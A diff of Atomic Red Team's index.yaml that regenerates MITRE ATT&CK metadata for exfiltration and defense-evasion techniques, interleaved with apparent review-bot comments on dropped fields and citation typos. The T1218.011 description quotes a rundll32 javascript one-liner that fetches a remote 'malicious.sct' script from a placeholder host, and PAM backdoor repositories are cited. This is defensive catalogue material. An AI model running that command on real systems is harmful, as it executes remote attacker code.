+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
@@ -60944,7 +61836,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1029:
technique:
@@ -60964,7 +61855,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1029
external_id: T1029
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:26:48.769Z'
name: Scheduled Transfer
description: |-
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60984,8 +61875,6 @@ exfiltration:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1011:
technique:
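Review bot: for T1029 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing is added in their place, whereas for T1078 (earlier in this diff) the `x_mitre_attack_spec_version` line is re-added as `3.2.0` after `object_marking_refs`. The same pattern of removing both lines with no replacement recurs for T1011.001, T1048.001, T1048.002, T1052.001, T1030, T1052 and T1055.011. Please confirm that `x_mitre_attack_spec_version` is still emitted elsewhere in these objects (for instance earlier in the key order, outside the visible context); if not, these techniques end up with no attack spec version at all while the rest of the index carries one.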
@@ -61032,7 +61921,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1011.001:
technique:
@@ -61052,7 +61940,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1011.001
url: https://attack.mitre.org/techniques/T1011/001
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:02:15.802Z'
name: Exfiltration Over Bluetooth
description: |-
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -61074,8 +61962,6 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020:
technique:
@@ -61129,7 +62015,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1020
atomic_tests: []
T1048.001:
@@ -61154,7 +62039,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-28T00:43:24.228Z'
name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over a symmetrically
encrypted network protocol other than that of the existing command and control
@@ -61189,12 +62074,10 @@ exfiltration:
- 'Command: Command Execution'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1020.001:
technique:
- modified: '2023-04-14T23:23:30.327Z'
+ modified: '2024-10-15T16:08:13.273Z'
name: Traffic Duplication
description: |-
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -61219,11 +62102,10 @@ exfiltration:
x_mitre_platforms:
- Network
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
created: '2020-10-19T13:40:11.118Z'
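Review bot: `x_mitre_network_requirements: false` is dropped from T1020.001 here (and from T1048 in a later hunk) alongside the `x_mitre_version` bump from '1.2' to '1.3'. Unlike the platform renames, this is a field removal rather than a rename, so any consumer that filters or annotates techniques on `x_mitre_network_requirements` will now see the key as absent rather than `false`; worth a line in the commit message, and worth checking that the generator is not dropping the field when the source object still carries it.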
@@ -61266,9 +62148,8 @@ exfiltration:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1567.001:
technique:
@@ -61315,7 +62196,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1048.002:
technique:
@@ -61341,7 +62221,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:44:11.953Z'
name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
Encrypted Non-C2 Protocol
description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -61374,13 +62254,11 @@ exfiltration:
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1048.002
atomic_tests: []
T1041:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:09:14.040Z'
name: Exfiltration Over C2 Channel
description: Adversaries may steal data by exfiltrating it over an existing
command and control channel. Stolen data is encoded into the normal communications
@@ -61429,12 +62307,11 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1041
atomic_tests: []
T1048:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:57:26.415Z'
name: Exfiltration Over Alternative Protocol
description: "Adversaries may steal data by exfiltrating it over a different
protocol than that of the existing command and control channel. The data may
@@ -61470,12 +62347,11 @@ exfiltration:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Network
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Access'
- 'Network Traffic: Network Traffic Flow'
@@ -61484,7 +62360,6 @@ exfiltration:
- 'Application Log: Application Log Content'
- 'File: File Access'
- 'Network Traffic: Network Connection Creation'
- x_mitre_network_requirements: false
type: attack-pattern
id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
created: '2017-05-31T21:30:44.720Z'
@@ -61508,9 +62383,8 @@ exfiltration:
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048
atomic_tests: []
T1052.001:
@@ -61533,7 +62407,7 @@ exfiltration:
- source_name: mitre-attack
external_id: T1052.001
url: https://attack.mitre.org/techniques/T1052/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.490Z'
name: Exfiltration over USB
description: Adversaries may attempt to exfiltrate data over a USB connected
physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61555,8 +62429,6 @@ exfiltration:
- 'Command: Command Execution'
x_mitre_system_requirements:
- Presence of physical medium or device
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1567.003:
technique:
@@ -61607,7 +62479,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.003
atomic_tests: []
T1567.002:
@@ -61657,7 +62528,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1567.002
atomic_tests: []
T1030:
@@ -61682,7 +62552,7 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:47:46.912Z'
name: Data Transfer Size Limits
description: An adversary may exfiltrate data in fixed size chunks instead of
whole files or limit packet sizes below certain thresholds. This approach
@@ -61705,13 +62575,11 @@ exfiltration:
- 'Network Traffic: Network Connection Creation'
- 'Network Traffic: Network Traffic Flow'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1030
atomic_tests: []
T1537:
technique:
- modified: '2024-04-11T15:53:00.577Z'
+ modified: '2024-10-15T16:08:25.344Z'
name: Transfer Data to Cloud Account
description: "Adversaries may exfiltrate data by transferring the data, including
through sharing/syncing and creating backups of cloud environments, to another
@@ -61752,9 +62620,8 @@ exfiltration:
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61802,7 +62669,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61824,7 +62690,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61848,12 +62714,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61917,6 +62781,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 80eeab0e97..404f7e131e 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,8 +97,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests:
- name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -137,7 +135,7 @@ defense-evasion:
elevation_required: false
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -200,21 +198,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
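Review bot: the updated description now asserts that files written to `/dev/shm`, `/run/shm`, `/var/run` and `/var/lock` are mapped directly to RAM, and adds the read-only-filesystem bypass sentence, yet `x_mitre_detection` for this object stays `''` in the following hunk and `atomic_tests` stays `[]`. The data source 'Process: Process Creation' added further down is the signal a defender would actually use for the new Linux scope (process creation with an image path under those directories), so the technique now has a broader scope with no detection text and no test covering it. No edit to the mirrored text is needed, but this is worth tracking as a follow-up.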
@@ -234,6 +238,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -241,10 +246,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
@@ -254,6 +261,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
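Review bot: the new 'Aquasec Muhstik Malware 2024' reference has a leading space inside its description string (`" Nitzan Yaakov. (2024, June 4). ...`). It is harmless YAML, but it is an upstream data artifact that will now be carried into anything rendering this reference. If the generator normalizes other fields, stripping leading whitespace here would be consistent; otherwise leave it byte-for-byte and treat it as inherited.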
@@ -262,15 +277,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
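Review bot: the citation keys 'Sysdig Fileless Malware 23022' and 'Akami Frog4Shell 2024' read like typos (23022 for 2022, Akami for Akamai) but they match the `(Citation: Sysdig Fileless Malware 23022)` and `(Citation: Akami Frog4Shell 2024)` tokens inserted into the description in the earlier hunk. Do not correct one side without the other: `source_name` is the lookup key for citation resolution, so a fix on only one side breaks the link. The `x_mitre_attack_spec_version` bump 3.1.0 -> 3.2.0 here is consistent with the T1218.011 and T1556.003 bumps.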
@@ -281,10 +303,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
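Review bot: the rewrapped description puts the entire rundll32 javascript example on one line (the line beginning `rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication`), roughly twice the width the rest of the scalar wraps at. It is still a valid double-quoted YAML scalar, so nothing breaks, but it shows the dumper's wrap width is not deterministic across regenerations and future diffs of this field will be noisy. The added ClickOnce sentence and the removed space before `(Citation: Trend Micro CPL)` are upstream content and fine.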
@@ -320,7 +342,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -350,7 +372,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
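Review bot: the stormshield URL changes (thisissecurity.stormshield.com -> www.stormshield.com/news/...) but 'Retrieved March 5, 2018' is unchanged, whereas the twitter -> x.com URL changes later in the patch also update the retrieval date to September 12, 2024. Inherited from upstream, so not a blocker, but anyone validating links against retrieval dates will see this entry as inconsistent.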
@@ -361,9 +383,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
@@ -840,49 +861,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
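Review bot: this hunk deletes the whole T1556.003 metadata block (platforms, domains, contributors, id, created, external_references) and the next hunk re-adds the same values in a different key order, so the net content change is far smaller than the ~40 removed lines suggest. The generator apparently emits keys in whatever order upstream provides; dumping with a fixed key order would keep regeneration diffs reviewable. Unrelated to this change but visible in the context lines: the description has its inline code stripped and split across lines (`pam_unix.so`, `, which retrieves, sets, ...`, `and /etc/shadow`, `.(Citation: ...)`), which dates from an earlier import and is still wrong.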
@@ -897,20 +879,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
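Review bot: the substantive changes to T1556.003 in this hunk are the removal of `x_mitre_permissions_required: [root]`, the addition of `x_mitre_deprecated: false` and `revoked: false`, and the bumps '2.0' -> '2.1' and 2.1.0 -> 3.2.0. Dropping the permissions field is the one that can matter to consumers: the detection text still talks about PAM module paths that only root can change, and anything filtering atomics by required privilege loses that hint. If upstream removed the field this is expected; either way, confirm the 'Malicious PAM rule' test below still declares `elevation_required` itself.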
@@ -1061,7 +1080,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -1088,8 +1107,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
@@ -1131,7 +1148,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
